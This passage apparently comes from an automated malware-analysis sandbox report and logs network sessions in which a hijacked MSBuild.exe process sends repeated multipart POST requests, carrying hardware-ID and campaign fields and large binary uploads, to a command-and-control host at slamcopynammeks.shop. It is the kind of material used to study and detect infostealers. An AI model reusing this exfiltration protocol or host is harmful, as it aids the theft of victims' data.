                                          2024-05-24 08:26:03 UTC1369INData Raw: 33 58 38 6a 2f 45 4e 6e 46 59 39 62 4c 54 68 42 7a 64 78 33 36 6b 57 67 7a 61 59 69 50 47 5a 39 2f 73 78 59 48 51 58 77 35 4b 67 49 39 53 38 32 41 32 74 52 48 4d 36 38 61 64 45 49 51 4f 43 2b 55 66 48 54 75 53 59 2f 37 2f 30 69 54 4a 4c 47 52 65 4e 6b 4b 73 76 37 70 6e 62 4a 73 49 56 49 53 4c 72 74 56 59 39 56 63 4f 38 45 5a 59 77 6a 4d 43 50 36 62 69 47 55 43 64 69 55 49 7a 66 73 79 50 55 76 4e 67 4e 70 68 56 72 49 49 71 66 66 52 45 39 6b 61 63 51 6a 6a 65 5a 69 71 48 51 33 2f 67 78 53 30 30 5a 38 37 75 59 4c 61 53 58 36 77 2f 70 59 44 42 73 76 66 41 41 61 78 76 32 75 42 32 53 4e 6f 69 51 76 70 66 52 2b 44 46 4c 4d 6c 48 62 69 4c 45 2b 38 72 2f 59 4a 75 6c 52 49 69 4c 72 74 55 59 6f 44 59 54 39 51 4d 56 30 35 2b 79 75 6d 66 66 37 51 30 67 5a 50 4e 76 47
                                          Data Ascii: 3X8j/ENnFY9bLThBzdx36kWgzaYiPGZ9/sxYHQXw5KgI9S82A2tRHM68adEIQOC+UfHTuSY/7/0iTJLGReNkKsv7pnbJsIVISLrtVY9VcO8EZYwjMCP6biGUCdiUIzfsyPUvNgNphVrIIqffRE9kacQjjeZiqHQ3/gxS00Z87uYLaSX6w/pYDBsvfAAaxv2uB2SNoiQvpfR+DFLMlHbiLE+8r/YJulRIiLrtUYoDYT9QMV05+yumff7Q0gZPNvG
                                          2024-05-24 08:26:03 UTC1369INData Raw: 57 4b 44 61 70 48 49 53 32 69 34 52 74 71 55 5a 32 6d 42 70 67 71 7a 38 6e 7a 6c 39 4f 55 55 53 78 33 55 49 75 66 34 58 32 33 32 36 55 42 72 55 64 7a 4c 50 47 33 42 33 46 5a 77 36 41 51 32 6a 65 5a 69 71 48 55 6d 70 63 57 4b 47 4e 61 6c 35 43 39 4c 2f 7a 43 75 45 47 76 57 43 59 74 6f 75 45 56 62 46 47 64 70 67 61 59 4b 73 2b 34 2f 37 2f 30 2b 78 6f 34 4d 67 2f 5a 6b 4d 5a 75 73 74 6d 30 57 37 67 59 45 32 6d 2f 39 42 70 37 55 5a 48 67 66 2f 35 4e 7a 34 48 78 6a 39 33 44 46 45 67 5a 50 4e 76 55 34 69 33 6b 6c 65 4d 66 38 67 42 67 4e 65 4f 6c 66 68 46 4a 6e 38 5a 38 6a 45 37 6b 37 50 48 42 33 38 67 59 63 6a 77 2f 38 4c 75 7a 66 2f 79 50 38 51 33 75 56 69 46 77 74 66 51 41 65 52 48 76 6b 42 61 59 4b 63 4f 4a 75 74 65 59 67 45 77 37 50 6c 2b 59 79 75 6c 54 67
                                          Data Ascii: WKDapHIS2i4RtqUZ2mBpgqz8nzl9OUUSx3UIuf4X2326UBrUdzLPG3B3FZw6AQ2jeZiqHUmpcWKGNal5C9L/zCuEGvWCYtouEVbFGdpgaYKs+4/7/0+xo4Mg/ZkMZustm0W7gYE2m/9Bp7UZHgf/5Nz4Hxj93DFEgZPNvU4i3kleMf8gBgNeOlfhFJn8Z8jE7k7PHB38gYcjw/8Luzf/yP8Q3uViFwtfQAeRHvkBaYKcOJuteYgEw7Pl+YyulTg


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549708104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:04 UTC286OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 12836
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:04 UTC12836OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:05 UTC810INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=n3iguqsk0hps3l9surqpoqeuvs; expires=Tue, 17-Sep-2024 02:12:43 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMn3XQgPSo5CQO9SXiebI5LMpM35vOdUYeozZKRASvgX1K5H43PlWJRn8pdDLhox%2FcRSv4kZx90guQ605Jwken2lmC1Ibc2SQdaAm%2Bj2CjHkLCnQ8ZnjVXfcJr%2B5Um%2FPsgQ6ffq5RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be60fedb64237-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                          Data Ascii: fok 8.46.123.175
                                          2024-05-24 08:26:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549709104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:05 UTC286OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 15078
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:05 UTC15078OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:06 UTC810INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=t9dflmh8lpljh9utt12ptohqv7; expires=Tue, 17-Sep-2024 02:12:45 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDxtV4jfdjyWTx6ErmeqTCf3g3bjoM4IZ2pAcm139Nc9YviNZZN31YMN8NBxUhaZZPWggH%2BLCOKPQ3%2BDMRLeaZNjsLnlk9EFgQ%2B9KS2%2FTGoLGCIAG8fwygoAxcDY2HkS0tLc62aVRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be6196cd94304-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                          Data Ascii: fok 8.46.123.175
                                          2024-05-24 08:26:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549710104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:06 UTC286OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 20568
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:06 UTC5237OUTData Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                          2024-05-24 08:26:07 UTC812INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=64o6vcptcrbklknqrkvkrvkqo1; expires=Tue, 17-Sep-2024 02:12:46 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ypcMDFdnIzvx4q6%2B5JCAtwTVqAyC4kgkqAGWX2%2B5jEnaOwl8OGbamgP09xEFB6vPkXxB5mOI%2FHZ5hspY18bpGuc9U2ry6ycaBcyTYdUnVg7QRScGWgPbv3r0qI%2FpFvKqbJfL%2FsIjIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be621ba8f43f4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                          Data Ascii: fok 8.46.123.175
                                          2024-05-24 08:26:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549711104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:08 UTC285OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 7089
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:08 UTC7089OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:09 UTC814INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=mpu9i2l23cfdocionn2f0hfblh; expires=Tue, 17-Sep-2024 02:12:47 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXeFf%2B854DA72mOTDoy1UY7WKoHAb8Y%2Fu2PFsJzYpopzftfzxO%2Bhmp%2FcBviGwxgoU%2F8E0f496v7NLmAMKBz8pH7QdszugD1XF3o5UwTaLvbkiv7F9VedNeXngSaY%2FJrKaclfTEnz2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be62b486043f1-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                          Data Ascii: fok 8.46.123.175
                                          2024-05-24 08:26:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549712104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:09 UTC285OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 1258
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:09 UTC1258OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:10 UTC810INHTTP/1.1 200 OK
                                          Date: Fri, 24 May 2024 08:26:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=r4p0nica5mptoe2juhkmom0jni; expires=Tue, 17-Sep-2024 02:12:49 GMT; Max-Age=9999999; path=/
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPWhr4GsQlPcNi40lfbN%2Fr5vhidcHS8OafwLTOYRZ71kM%2BgMEWKZhzZWJNt2wwS6mee2J4v4giEN6DH2cvGn9TwQbBsScVg0gXByPhr0XPthZ3v4zMk%2BuV2gn626wL%2B1uv0lwvFzag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 888be6340bd4335a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-05-24 08:26:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                          Data Ascii: fok 8.46.123.175
                                          2024-05-24 08:26:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549713104.21.12.1124435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-24 08:26:11 UTC287OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 585805
                                          Host: slamcopynammeks.shop
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 39 38 30 39 33 44 36 34 33 37 46 46 38 34 32 32 33 33 43 38 41 37 35 31 43 33 30 37 31 36 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 52 54 53 43 66 32 2d 2d 53 75 6e 61 72
                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6C98093D6437FF842233C8A751C30716--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"RTSCf2--Sunar
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 44 b1 39 3c 2e b0 78 04 18 4e d5 db 55 a3 40 f6 49 b1 da 29 ab 06 bf e0 e1 ae e4 a1 99 e9 fd ee 78 60 3e 42 cd 2f fa d5 24 43 1b ab 0a 94 1f 6a ad cb ac 02 10 f8 76 34 45 fe ee d1 14 11 20 b7 08 65 35 c3 99 27 dd 69 ff ff 9e 73 19 d0 71 08 0b 67 56 c9 de bc e3 40 1b f3 5b ba 21 b8 63 bf b9 ca ed b1 3b b7 48 52 23 37 7e f3 a8 ff ae ce 3e 09 82 a6 1d fe f7 1b ae 4e 40 77 c8 03 dc 46 83 16 22 b1 3f 04 91 85 5c 30 37 45 ce 2d 33 22 b2 d2 62 a5 3f b3 8a 1b 62 ff 23 6f f8 d4 8c c6 8e 7a aa 7c 35 0f 50 24 f9 bc b8 c0 9b b6 ce 42 2d 34 3c b9 49 ad cd 82 9a ef 75 ab 8e 00 01 31 72 d6 3d ce 90 44 71 f5 ee c5 0e 9a f9 65 79 1f dc 75 3e 5d 35 36 fc fe 66 91 c5 5f db 7e 62 d4 75 49 8b 2c 97 1c fe b4 1b e4 c4 85 0b 20 4f 93 b3 7e c1 31 d2 e1 08 8a 91 d9 c1 9e ac 29 49
                                          Data Ascii: D9<.xNU@I)x`>B/$Cjv4E e5'isqgV@[!c;HR#7~>N@wF"?\07E-3"b?b#oz|5P$B-4<Iu1r=Dqeyu>]56f_~buI, O~1)I
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: 1d 9d 86 00 c6 97 50 da 7b da 7e 59 34 99 dc 10 af d6 d0 94 11 b0 a9 b7 54 39 99 e4 f7 09 81 14 79 c5 43 51 af 02 6d c9 81 01 5c a0 68 27 8c a5 cb 03 88 9b e9 46 0c 63 5f ce e5 95 e5 0f 9a 4d 01 ff e7 85 90 82 37 9c f1 00 70 a6 28 d9 f5 9d 9b ab 24 30 bc 2d 02 c8 af 11 dc 2b 08 98 1d 41 75 08 55 23 00 6d 25 d4 dc ff 9d 8c 73 ff 30 74 ad 17 ca 03 88 5c d5 4d dd 52 83 e8 30 dc 28 01 ce 0e a4 a6 06 49 04 52 04 b6 de 32 86 19 b3 f5 74 54 3b fd 09 8a 56 df fe c1 23 de 88 67 bf ec 95 37 aa 47 47 f6 a1 0a 40 4a bf ee f9 b7 87 7c cf 8d 84 f7 6d e3 68 b9 fb 15 bc c0 b4 94 2c 2c 86 3a ba 47 66 1a fa 5c db d0 b5 13 3f b0 dc d3 23 19 b7 0d 4f ee 1a 1c d8 ca 8c 02 29 08 f3 de 8d fb 10 c1 bb 5f a1 af 5b fc f0 ce 55 7f 44 da d1 8c 50 75 6c 2f 55 62 06 3c 8f 2f 43 b2 aa
                                          Data Ascii: P{~Y4T9yCQm\h'Fc_M7p($0-+AuU#m%s0t\MR0(IR2tT;V#g7GG@J|mh,,:Gf\?#O)_[UDPul/Ub</C
                                          2024-05-24 08:26:11 UTC15331OUTData Raw: fa ee 55 e2 2f 93 04 09 cd 2e 75 65 d5 b3 20 af 50 3f 36 ea a1 6a 33 ae cd cc 37 61 e8 20 f8 a4 5c ef c9 d5 55 19 2d 0a 7e 9f 71 cf 52 21 d6 62 3a ef 69 b3 7e 00 92 e7 86 6c 1b 6c db 33 a7 e9 24 27 b4 25 24 8a 87 37 a4 b0 04 bd 7b dc dd 34 c1 34 35 4b 94 62 47 cb f5 b1 1c 8c 12 dd 07 65 82 cb e8 e1 d2 0d cb c1 5b e0 cc c5 b0 a3 5a f1 c2 a0 70 7d 70 09 3d 2f 42 d8 f5 de 03 5e f8 23 ac 6e ee 66 55 8b b4 0d 8d 79 a3 7d ec 0e de 13 4c 63 9d 85 f4 64 c1 3e c0 97 a4 cf 61 57 49 50 60 7b 9f 7c 85 d9 76 56 4f f8 24 ae f0 33 0b bc 60 b4 4f c7 24 16 0c 81 45 e3 33 3f b9 23 ac cb ab 95 48 ca 33 3f 9e 50 4e 61 ad 13 33 6c 78 e0 58 e2 ee 8f 22 95 16 be 01 b7 b8 d9 b4 11 0e e5 12 1a 70 8e ef 86 ff d8 88 1b 46 70 1c 0d 03 f8 89 58 54 72 da ac dc f0 e5 a3 bd ac d1 7d d9
                                          Data Ascii: U/.ue P?6j37a \U-~qR!b:i~ll3$'%$7{445KbGe[Zp}p=/B^#nfUy}Lcd>aWIP`{|vVO$3`O$E3?#H3?PNa3lxX"pFpXTr}
